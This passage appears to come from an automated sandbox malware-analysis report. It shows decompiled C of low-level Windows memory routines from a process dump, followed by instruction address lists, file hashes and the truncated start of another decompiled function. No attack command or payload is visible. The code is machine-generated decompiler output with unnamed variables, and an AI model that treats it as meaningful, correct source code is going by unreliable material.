				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1081178);
				E00FFD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01074C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E00FED000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01075542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x10960e8;
								if( *0x10960e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x10960e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E00FE9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E00FE6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E00FEF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E00FEF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E00FEF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E00FEFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E00FEFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E00FEF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E00FEF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01074CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E00FFD130(_t427, _t494, _t511);
				}
			}

0x01075ba5
0x01075baa
0x01075baf
0x01075bb4
0x01075bb6
0x01075bbc
0x01075bbe
0x01075bc4
0x01075bcd
0x01075bd3
0x01075bd6
0x01075bdc
0x01075be0
0x01075be3
0x01075beb
0x01075bf2
0x01075bf8
0x01075bfe
0x01075c04
0x01075c0e
0x01075c18
0x01075c1f
0x01075c25
0x01075c2a
0x01075c2c
0x01075c32
0x01075c3a
0x01075c3f
0x01075c42
0x01075c48
0x01075c5b
0x01075c5b
0x01075c2c
0x01075cb7
0x01075cb9
0x01075cbf
0x01075cc2
0x01075cca
0x01075ccb
0x01075ccb
0x01075cd1
0x01075cd7
0x01075cda
0x01075ce1
0x01075ce4
0x01075ce7
0x01075ced
0x01075cf3
0x01075cf9
0x01075cff
0x01075d08
0x01075d0a
0x01075d0e
0x01075d10
0x00000000
0x00000000
0x01075d16
0x01075d1a
0x00000000
0x00000000
0x01075d20
0x01075d22
0x01075d25
0x01075d2f
0x01075d2f
0x01075d33
0x01075d3d
0x01075d49
0x01075d4b
0x00000000
0x00000000
0x01075d5a
0x01075d5d
0x01075d60
0x00000000
0x00000000
0x01075d66
0x01075d69
0x00000000
0x00000000
0x01075d6f
0x01075d6f
0x01075d73
0x01075d79
0x01075d7f
0x01075d86
0x01075d95
0x01075d98
0x01075dba
0x01075dcb
0x01075dce
0x01075dd3
0x01075dd6
0x01075dd8
0x01075de6
0x01075dec
0x01075dee
0x01075df1
0x01075df3
0x0107635a
0x0107635a
0x00000000
0x0107635a
0x01075dfe
0x01075e02
0x01075e05
0x01075e07
0x01075e10
0x01075e13
0x01075e1b
0x01075e1c
0x01075e21
0x01075e22
0x01075e23
0x01075e25
0x01075e2a
0x01075e2c
0x01075e2e
0x01075e36
0x01075e39
0x01075e42
0x01075e47
0x01075e4d
0x01075e54
0x01075e54
0x01075e54
0x01075e2e
0x01075e5c
0x01075e5f
0x01075e62
0x01075e64
0x01075e6b
0x01075e70
0x01075e7a
0x01075e7a
0x01075e7a
0x01075e6b
0x01075e7e
0x01075e7f
0x01075e7f
0x01075e81
0x01075e87
0x01075e8b
0x01075e8c
0x01075e8c
0x01075e8c
0x01075e9a
0x01075e9c
0x01075ea2
0x01075ea6
0x01075f50
0x01075f50
0x01075f57
0x01075f66
0x01075f66
0x01075f66
0x01075f68
0x01075f6a
0x010763d0
0x00000000
0x01075f70
0x01075f70
0x01075f91
0x01075f9c
0x01075f9e
0x01075fa4
0x01075fa6
0x0107638c
0x01076392
0x010763a1
0x010763a7
0x010763af
0x010763af
0x010763bd
0x010763d8
0x00000000
0x010763d8
0x01075fac
0x01075fb2
0x01075fb4
0x01075fbd
0x01075fc6
0x01075fce
0x01075fd4
0x01075fdc
0x01075fec
0x01075fed
0x01075fee
0x01075fef
0x01075ff9
0x01075ffa
0x01075ffb
0x01075ffc
0x01076000
0x01076004
0x01076012
0x01076012
0x01076018
0x01076019
0x0107601a
0x0107601b
0x0107601c
0x01076020
0x01076059
0x0107605c
0x01076061
0x01076061
0x01076022
0x01076022
0x01076022
0x01076025
0x0107602a
0x0107602b
0x01076031
0x01076037
0x01076038
0x0107603e
0x01076048
0x01076049
0x0107604a
0x0107604b
0x0107604c
0x0107604d
0x01076053
0x01076054
0x01076054
0x01076062
0x01076065
0x01076067
0x0107606a
0x01076070
0x01076075
0x01076076
0x01076081
0x01076087
0x01076095
0x01076099
0x0107609e
0x010760a4
0x010760ae
0x010760b0
0x010760b3
0x010760b6
0x010760b8
0x010760ba
0x010760ba
0x010760ba
0x010760ba
0x010760be
0x010760c0
0x010760c5
0x010760c5
0x010760c5
0x010760c6
0x010760cd
0x01076114
0x010760cf
0x010760cf
0x010760d4
0x010760d5
0x010760da
0x010760db
0x010760e1
0x010760e2
0x010760e8
0x010760f8
0x010760fd
0x010760fe
0x01076102
0x01076104
0x01076107
0x01076109
0x0107610b
0x0107610b
0x0107610b
0x0107610b
0x0107610f
0x0107610f
0x01076117
0x0107611a
0x0107611f
0x01076125
0x01076134
0x01076139
0x0107613f
0x01076146
0x01076148
0x0107614b
0x0107614d
0x0107614f
0x0107614f
0x0107614f
0x0107614f
0x01076153
0x01076159
0x01076159
0x0107615c
0x01076163
0x01076169
0x0107616c
0x01076172
0x01076181
0x01076186
0x01076187
0x0107618b
0x01076191
0x01076195
0x010761a3
0x010761bb
0x010761c0
0x010761c3
0x010761cc
0x010761d0
0x010761dc
0x010761de
0x010761e1
0x010761e4
0x010761e6
0x010761e8
0x010761e8
0x010761e8
0x010761e8
0x010761e6
0x010761ec
0x010761f3
0x01076203
0x01076209
0x0107620a
0x01076216
0x0107621d
0x01076227
0x01076241
0x01076246
0x0107624c
0x01076257
0x01076259
0x0107625c
0x0107625e
0x01076260
0x01076260
0x01076260
0x01076260
0x0107625e
0x01076264
0x01076267
0x01076269
0x01076315
0x01076315
0x0107631b
0x0107631e
0x01076324
0x01076327
0x0107632f
0x01076330
0x01076333
0x0107633a
0x0107633c
0x01076335
0x01076335
0x01076335
0x0107633f
0x01076342
0x0107634c
0x01076352
0x01076355
0x01076355
0x01076359
0x00000000
0x0107626f
0x01076275
0x01076275
0x01076278
0x0107627e
0x0107627e
0x01076281
0x01076287
0x0107628d
0x01076298
0x0107629c
0x010762a2
0x0107629e
0x0107629e
0x0107629e
0x010762a7
0x010762a7
0x010762aa
0x010762b0
0x010762f0
0x010762f0
0x010762f2
0x010762f8
0x010762fd
0x010762b2
0x010762b2
0x010762b2
0x010762b5
0x010762dd
0x010762e2
0x010762e5
0x010762b7
0x010762b8
0x010762bb
0x010762bd
0x010762c0
0x010762c4
0x010762cd
0x010762cd
0x010762c0
0x010762bb
0x010762b5
0x01076302
0x01076303
0x01076305
0x01076305
0x01076305
0x0107630c
0x0107630c
0x00000000
0x0107627e
0x01076269
0x01075eac
0x01075ebb
0x01075ebe
0x01075ecb
0x01075ecb
0x01075ece
0x01075ece
0x01075ed4
0x01075ed7
0x01075ed9
0x01075edb
0x01075edb
0x01075ee1
0x01075ee1
0x01075ee3
0x01075f20
0x01075f20
0x01075ee5
0x01075ee5
0x01075ee5
0x01075ee8
0x01075f11
0x01075f18
0x01075eea
0x01075eea
0x01075eed
0x01075ef2
0x01075ef8
0x01075efb
0x01075f0a
0x01075f0a
0x01075eed
0x01075ee8
0x01075f22
0x01075f28
0x00000000
0x00000000
0x01075f30
0x01075f31
0x01075f37
0x01075f3a
0x01075f3d
0x01075f44
0x00000000
0x00000000
0x00000000
0x01075f46
0x01075f48
0x01075f4d
0x00000000
0x01075f4d
0x01075dda
0x01075ddf
0x00000000
0x01075ddf
0x01075dd8
0x01075da7
0x01075da9
0x01075dac
0x01075dae
0x00000000
0x01075db4
0x01075db4
0x00000000
0x01075db4
0x01075dae
0x01075d88
0x01075d8d
0x01076363
0x01076369
0x0107636a
0x01076370
0x01076372
0x0107637a
0x0107637b
0x0107637d
0x00000000
0x00000000
0x0107637f
0x01076385
0x00000000
0x01076385
0x01075d38
0x01075d3b
0x00000000
0x00000000
0x00000000
0x01075d3b
0x01075d27
0x01075d29
0x00000000
0x00000000
0x00000000
0x01076360
0x00000000
0x01076360
0x01075c10
0x01075c10
0x010763da
0x010763e5
0x010763e5

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702924c0ae01d74e6a7b6efccfc3c7215289ab0a62cd8b7a263f4cf970c5164b
Instruction ID: e7ce5ac61d441f9dfd2395dce97282e8276913c7dba6d8a88732b50a2481031d
Opcode Fuzzy Hash: 702924c0ae01d74e6a7b6efccfc3c7215289ab0a62cd8b7a263f4cf970c5164b
Instruction Fuzzy Hash: AE424871D006298FEB64CF68C881BA9BBF1FF49304F1481EAD98DAB242D7359985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00FC4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x109d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E00FDF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E00FC6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L00FC4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E00FC6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
